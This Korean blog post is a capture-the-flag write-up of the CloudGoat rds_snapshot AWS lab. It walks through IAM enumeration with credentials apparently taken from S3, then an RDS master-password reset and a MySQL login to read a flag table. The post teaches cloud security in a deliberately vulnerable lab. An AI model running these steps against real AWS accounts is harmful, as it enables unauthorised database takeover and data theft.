반응형
문제 URL 경로
cloudgoat/cloudgoat/scenarios/aws/rds_snapshot/README.md at master · RhinoSecurityLabs/cloudgoat
CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool - RhinoSecurityLabs/cloudgoat
github.com
문제 설명
1. Starting with access to EC2, the user can leverage the privileges of the EC2 instance to steal credentials from S3.
2. With the stolen credentials, the attacker can gain RDS Snapshot restore privileges, which will allow them to access the DB and retrieve flags.
문제 풀이
1. 현재 권한 분석
# ---------- 1. 현재 권한 분석 ----------
### 프로파일 생성 ###
aws configure --profile s3_secret
### 계정 리스트 확인 ###
aws iam list-users \
--profile s3_secret
{
"Users": [
{
"Path": "/",
"UserName": "cg-rds-instance-user-cgidlienje4waf",
"UserId": "AIDA2YICACBLYARASU3BI",
"Arn": "arn:aws:iam::739275444311:user/cg-rds-instance-user-cgidlienje4waf",
"CreateDate": "2025-05-02T03:20:25Z"
}
}
### 정책 리스트 확인 ###
aws iam list-policies \
--profile s3_secret | grep cgidlienje4waf
### <user> 에게 적용된 Inline 정책 ###
aws iam list-user-policies \
--user-name cg-rds-instance-user-cgidlienje4waf \
--profile s3_secret
{
"PolicyNames": [
"cg-david-policy"
]
}
### <user> 에게 적용된 Inline 정책 (확인) ###
aws iam get-user-policy \
--policy-name cg-david-policy \
--user-name cg-rds-instance-user-cgidlienje4waf \
--profile s3_secret
{
"UserName": "cg-rds-instance-user-cgidlienje4waf",
"PolicyName": "cg-david-policy",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"rds:DescribeDBInstances",
"rds:AddTagsToResource",
"rds:DescribeDBSnapshots",
"rds:RestoreDBInstanceFromDBSnapshot",
"rds:ModifyDBInstance",
"iam:Get*",
"iam:List*"
],
"Effect": "Allow",
"Resource": "*"
}
]
}
}
### 역할 리스트 ###
aws iam list-roles \
--profile s3_secret
{
"Path": "/",
"RoleName": "cg-ec2-admin-role",
"RoleId": "AROA2YICACBLQ2G44QKBG",
"Arn": "arn:aws:iam::739275444311:role/cg-ec2-admin-role",
"CreateDate": "2025-05-02T03:20:25Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
}
### 역할 확인 ###
aws iam get-role \
--role-name cg-ec2-admin-role \
--profile s3_secret
{
"Role": {
"Path": "/",
"RoleName": "cg-ec2-admin-role",
"RoleId": "AROA2YICACBLQ2G44QKBG",
"Arn": "arn:aws:iam::739275444311:role/cg-ec2-admin-role",
"CreateDate": "2025-05-02T03:20:25Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600,
"Tags": [
{
"Key": "Scenario",
"Value": "rds_snapshot"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
],
"RoleLastUsed": {
"LastUsedDate": "2025-05-02T04:05:51Z",
"Region": "us-east-1"
}
}
}
### DB 인스턴스 리스트 ###
aws rds describe-db-instances --profile s3_secret
{
"DBInstances": [
{
"DBInstanceIdentifier": "cg-rds",
"DBInstanceClass": "db.t3.micro",
"Engine": "mysql",
"DBInstanceStatus": "available",
"MasterUsername": "cgadmin",
"Endpoint": {
"Address": "cg-rds.ca5yusseq5gc.us-east-1.rds.amazonaws.com",
"Port": 3306,
"HostedZoneId": "Z2R2ITUGPM61AM"
},
"AllocatedStorage": 20,
"InstanceCreateTime": "2025-05-02T03:24:11.656Z",
"PreferredBackupWindow": "06:14-06:44",
"BackupRetentionPeriod": 0,
"DBSecurityGroups": [],
"VpcSecurityGroups": [
{
"VpcSecurityGroupId": "sg-0c427606feb354b7b",
"Status": "active"
}
],
"DBParameterGroups": [
{
"DBParameterGroupName": "default.mysql5.7",
"ParameterApplyStatus": "in-sync"
}
],
# 중간생략 #
"CustomerOwnedIpEnabled": false,
"ActivityStreamStatus": "stopped",
"BackupTarget": "region",
"NetworkType": "IPV4",
"StorageThroughput": 0,
"CertificateDetails": {
"CAIdentifier": "rds-ca-rsa2048-g1"
},
"DedicatedLogVolume": false,
"IsStorageConfigUpgradeAvailable": false,
"EngineLifecycleSupport": "open-source-rds-extended-support"
}
]
}
2. DB 패스워드 수정 및 DB 정보 탈취
# ---------- 2. DB 패스워드 수정 및 DB 정보 탈취 ----------
### DB 인스턴스 수정 (master-user-password) ###
aws rds modify-db-instance --db-instance-identifier cg-rds --master-user-password <원하는_패스워드> --profile s3_secret
### DB 인스턴스 접속 ###
mysql -h cg-rds.ca5yusseq5gc.us-east-1.rds.amazonaws.com -P 3306 -u cgadmin -p
### DB 명령어 ###
1) show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| innodb |
| mydatabase |
| mysql |
| performance_schema |
| sys |
+--------------------+
6 rows in set (0.00 sec)
2) use mydatabase;
3) show tables;
+----------------------+
| Tables_in_mydatabase |
+----------------------+
| flag |
+----------------------+
1 row in set (0.00 sec)
4) select * from flag;
보안 개선 방안
1. IAM 권한은 최소로 운영할 것
내용이 유용하셨다면 좋아요&댓글 부탁드립니다.
이 블로그를 이끌어갈 수 있는 강력한 힘입니다!
caul334@gmail.com
반응형
'IT > Cloud' 카테고리의 다른 글
| [CloudGoat] ec2_ssrf 문제풀이 Write-up (0) | 2025.05.09 |
|---|---|
| [CloudGoat] iam_privesc_by_attachment 문제풀이 Write-up (0) | 2025.04.29 |
| [CloudGoat] beanstalk_secrets 문제풀이 Write-up (0) | 2025.04.15 |
| AWS 역할전환 sts AssumeRole 성립 조건 및 예외사항 (0) | 2025.04.14 |
| [CloudGoat] vulnerable_lambda 문제풀이 Write-up (0) | 2025.04.11 |